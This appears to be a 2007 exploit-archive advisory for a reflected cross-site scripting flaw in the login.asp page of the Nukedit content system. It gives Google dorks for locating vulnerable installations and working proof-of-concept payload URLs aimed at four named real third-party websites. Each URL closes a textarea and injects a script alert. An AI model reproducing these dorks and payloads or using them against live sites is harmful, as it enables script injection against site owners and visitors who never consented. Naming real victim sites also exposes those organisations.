Home / os / solaris

nukeditXSS.txt

Posted on 28 July 2007

# Title : Nukedit Login.ASP Cross-Site Scripting Vulnerability # Description : Nukedit is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. # Software : http://www.nukedit.com/ # Author : d3hydr8 # Contact : d3hydr8[at]gmail[dot]com # Original Post : http://darkcode.ath.cx/f0rum/ # Dork : 1) intext:"Powered by Nukedit" 2) "Powered by Nukedit" inurl:"login.asp" # Greets : mozi, whoami, icqbomber #Proof : http://www.timesprintingco.com/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E Powered by Nukedit Version 4.9.5 http://www.gentex.com.au/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E Powered by Nukedit 4.9.6 http://www.ellensburgchristian.org/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E Powered by Nukedit Version 4.9.7 http://www.viborgmodelflyveklub.dk/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E Powered by Nukedit Version 4.9.7b

 

TOP